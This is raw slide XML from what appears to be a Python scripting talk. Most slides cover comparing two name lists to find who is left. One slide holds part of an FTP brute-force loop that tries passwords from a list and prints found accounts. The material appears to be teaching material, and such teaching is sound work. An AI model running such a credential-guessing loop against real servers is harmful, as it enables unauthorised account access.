          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>passlistfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = open("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>passlist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>", "r")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  for password in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>passlistfile.readlines</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>():</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    user = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>user.rstrip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    password = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>password.rstrip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    print("[.] Trying user: " + user + " password: " + password)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>brute_result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ftp_brute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ftpsvr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, user, password)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>brute_result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> == True:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>      print("[+] FOUND ACCOUNT User: " + user + " Password: " + password)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3531388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7F66-6E9D-794C-B6E6-18BA110652EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Final output</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10DCCF88-F29B-8344-A5FC-180FC448C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88" y="1417638"/>
            <a:ext cx="8526282" cy="4749801"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3038428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5470-99C9-B847-8ECA-EC4A296C8992}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>List Comparison</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{019481D8-A2AB-9745-B7E2-8B66E969447D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>This is probably a classic CS problem (I wouldn’t know, not a CS background) and maybe not ”cool” but it solve a constant problem I’ve faced in my daily duties in terms of rolling out services and needing to compare a list of everyone/everything to those that have done something and end up with a list of those things that still need to “do the thing”.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="130250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D070-4176-C74A-9BAF-2262C21D971E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Compare the Lists – Who’s Left?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B8D67EA-1551-1E45-B897-F779B5DA6860}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Alice</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Brian</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Chandra</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Diana</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Elanna</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Frederick</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Greg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Heidi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Abhishek</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{030A8A98-0C41-1E4A-805E-9CCC7472B0F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Alice</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Brian</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Diana</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Frederick</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="369417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D070-4176-C74A-9BAF-2262C21D971E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Compare the Lists – Who’s Left?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B8D67EA-1551-1E45-B897-F779B5DA6860}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0"/>
              <a:t>Alice</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0"/>
              <a:t>Brian</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Chandra</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0"/>
              <a:t>Diana</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Elanna</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0"/>
              <a:t>Frederick</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Greg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Heidi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Abhishek</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{030A8A98-0C41-1E4A-805E-9CCC7472B0F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0"/>
              <a:t>Alice</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0"/>
              <a:t>Brian</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0"/>
              <a:t>Diana</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0"/>
              <a:t>Frederick</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="183467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Sometimes…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>… there will not be the tools you need to do your job</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>… there will be tools, but you’ll need to modify/extend them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>… you’ll want to automate something</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>… you’ll need to analyze/debug something</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>… you just feel like doing an academic exercise</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2883154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D070-4176-C74A-9BAF-2262C21D971E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Compare </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> List </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>of remaining</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B8D67EA-1551-1E45-B897-F779B5DA6860}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0"/>
              <a:t>Alice</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0"/>
              <a:t>Brian</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Chandra</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0"/>
              <a:t>Diana</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Elanna</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0"/>
              <a:t>Frederick</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Greg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Heidi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Abhishek</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{030A8A98-0C41-1E4A-805E-9CCC7472B0F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286000" y="1536192"/>
            <a:ext cx="3657600" cy="4590288"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0"/>
              <a:t>Alice</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0"/>
              <a:t>Brian</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0"/>
              <a:t>Diana</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" strike="sngStrike" dirty="0"/>
              <a:t>Frederick</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B08AFECE-1DFD-EC44-BE8D-1FF78FA159E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4836694" y="1536192"/>
            <a:ext cx="4572000" cy="2246769"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Chandra</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Elanna</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Greg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Heidi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Abhishek</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3218854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1ACE-BDDF-E54D-874A-7D5C4E1ED4A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Slightly Different Formats</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E928951C-37A4-B847-93B2-AE79186A4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7638"/>
            <a:ext cx="9144000" cy="2737556"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC64F9CF-2714-C340-84CC-5DEDFD20632A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="268224" y="4679942"/>
            <a:ext cx="3584448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>line[0] = user</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E86FDD89-012E-BB40-8E90-B9D6D16DAB03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="4679942"/>
            <a:ext cx="3913632" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
